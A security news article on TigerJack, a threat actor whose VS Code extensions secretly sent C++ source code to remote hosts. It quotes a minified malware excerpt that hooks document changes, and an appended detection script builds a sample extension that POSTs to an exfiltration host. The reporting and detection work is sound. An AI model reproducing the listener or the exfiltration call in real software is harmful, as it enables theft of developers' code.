TigerJack Hacks Infiltrated Developer Marketplaces with 11 Malicious VS Code Extensions

A sophisticated threat actor known as TigerJack has systematically infiltrated developer marketplaces with at least 11 malicious Visual Studio Code extensions, targeting thousands of unsuspecting developers worldwide.

Operating under multiple publisher identities including ab-498, 498, and 498-00, this cybercriminal has deployed a comprehensive attack arsenal designed to steal source code, mine cryptocurrency, and establish remote backdoors for complete system control.

The scale of this operation is staggering. Two of TigerJack’s most successful extensions, “C++ Playground” and “HTTP Format,” infected over 17,000 developers before Microsoft quietly removed them from its marketplace. However, the threat persists beyond the initial takedown.

TigerJack’s git repository (Source – Koi)

These malicious extensions remain fully operational in the OpenVSX marketplace, which powers popular IDE alternatives like Cursor and Windsurf, continuing their covert operations months after their removal from Microsoft’s platform.

What makes this campaign particularly insidious is the sophisticated deception employed by the threat actor.

The extensions deliver exactly the functionality they promise while simultaneously conducting malicious activities in the background.

Developers installing these tools receive genuine utility – code compilation, error highlighting, and formatting capabilities – creating the perfect cover for the underlying malware operations.

Koi analysts identified the malware’s sophisticated multi-layered approach during their comprehensive investigation.

The threat actor employs a trojan horse strategy, initially publishing benign extensions to build trust and accumulate positive reviews before deploying malicious updates.

This methodical approach allowed TigerJack to establish credibility within the developer community while positioning for large-scale intellectual property theft.

Even as security researchers investigated this operation, TigerJack demonstrated remarkable persistence by launching a coordinated republication campaign.

On September 17, 2025, five new extensions appeared simultaneously under the “498-00” publisher account, including a repackaged version of the original C++ Playground malware.

TigerJack’s personal Facebook account (Source – Koi)

This systematic approach reveals an operation designed for longevity rather than opportunistic attacks.

Code Theft Mechanism and Technical Implementation

The technical sophistication of TigerJack’s code exfiltration mechanism exemplifies advanced malware engineering.

The “C++ Playground” extension activates automatically through its onStartupFinished trigger and establishes a document change listener that monitors every C++ file within the developer’s workspace.

The malware employs surgical precision, targeting only C++ files so that developers working in other programming languages see nothing unusual.

Every keystroke triggers the malicious function after a carefully calibrated 500-millisecond delay – optimized to capture code in real-time while avoiding performance degradation that might alert users.

The complete source code gets packaged into JSON payloads and transmitted to multiple exfiltration endpoints, including “ab498.pythonanywhere.com” and “api.codex.jaagrav.in.”

The payload structure reveals the comprehensive scope of data theft, capturing not only the complete C++ source code but also processed versions and simulated input data.

// Excerpt from the minified extension bundle: P is the vscode API module,
// mt.myfile remembers the last file handled, and Bt() is the malicious handler
// the article describes.
P.workspace.onDidChangeTextDocument((i) => {
    // Fire only for C++ documents that are backed by a real file on disk.
    if (i.document &&
        i.document.languageId == "cpp" &&
        i.document?.uri.scheme == "file") {
        // When a different C++ file is edited, run Bt() on it and record its URI
        // (j is defined elsewhere in the bundle and is not shown in this excerpt).
        (j?.document.uri.toString() != mt.myfile &&
            (mt.myfile != i.document.uri.toString()) &&
            (Bt(i), (mt.myfile = i.document.uri.toString())))
    }
})

The exfiltrated data includes breakthrough algorithms, competitive advantages, thesis projects, and proprietary code – representing months or years of intellectual property theft.

This mechanism operates invisibly alongside the extension’s legitimate functionality, making detection extremely challenging for individual developers who observe only the promised features while their most valuable digital assets are systematically stolen.
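As an added example (not code from the article, from Koi, or from the extensions themselves), the following Python check walks a VS Code extensions folder and flags the indicators the article names: the TigerJack publisher aliases, the onStartupFinished activation event, the two exfiltration hosts, and a document-change listener keyed to languageId "cpp". The sample extension folder it builds is constructed for illustration and contains no real extension files.

```python
import json, re, tempfile
from pathlib import Path

# Indicators quoted in the article: publisher aliases and exfiltration hosts.
SUSPECT_PUBLISHERS = {"ab-498", "498", "498-00"}
SUSPECT_HOSTS = ("ab498.pythonanywhere.com", "api.codex.jaagrav.in")
# Behaviour described in the article: a change listener keyed to languageId "cpp".
CPP_LISTENER = re.compile(
    r"onDidChangeTextDocument[\s\S]{0,400}?languageId\s*===?\s*[\"']cpp[\"']")

def scan_extension(ext_dir: Path) -> list[str]:
    """Return human-readable findings for one installed extension folder."""
    pkg_path = ext_dir / "package.json"
    if not pkg_path.is_file():
        return []  # not an extension folder (e.g. marker directories)
    pkg = json.loads(pkg_path.read_text(encoding="utf-8"))
    findings = []
    if pkg.get("publisher") in SUSPECT_PUBLISHERS:
        findings.append(f"publisher '{pkg['publisher']}' matches a TigerJack alias")
    if "onStartupFinished" in pkg.get("activationEvents", []):
        findings.append("activates on onStartupFinished (runs without user action)")
    for js in ext_dir.rglob("*.js"):
        src = js.read_text(encoding="utf-8", errors="replace")
        for host in SUSPECT_HOSTS:
            if host in src:
                findings.append(f"{js.name}: references exfiltration host {host}")
        if CPP_LISTENER.search(src):
            findings.append(f"{js.name}: document-change listener filtered to C++ files")
    return findings

def scan_all(extensions_root: Path) -> dict[str, list[str]]:
    """Scan every folder under the root (e.g. ~/.vscode/extensions); keep only hits."""
    return {d.name: hits for d in sorted(extensions_root.iterdir())
            if d.is_dir() and (hits := scan_extension(d))}

def build_sample() -> Path:
    """Constructed sample folder mirroring the article's indicators (not real files)."""
    root = Path(tempfile.mkdtemp())
    ext = root / "498-00.cpp-playground-0.0.1"
    (ext / "out").mkdir(parents=True)
    (ext / "package.json").write_text(json.dumps({
        "name": "cpp-playground", "publisher": "498-00",
        "activationEvents": ["onStartupFinished"], "main": "./out/extension.js"}))
    (ext / "out" / "extension.js").write_text(
        'P.workspace.onDidChangeTextDocument((i)=>{if(i.document.languageId=="cpp")'
        'fetch("https://ab498.pythonanywhere.com/upload",{method:"POST"})});')
    return root

if __name__ == "__main__":
    for name, hits in scan_all(build_sample()).items():
        print(name, *("  - " + h for h in hits), sep="\n")
```

Point scan_all at your real extensions directory to check an installed IDE; on an OpenVSX-based editor such as Cursor or Windsurf the folder name differs, but the layout (one folder per extension with a package.json) is the same.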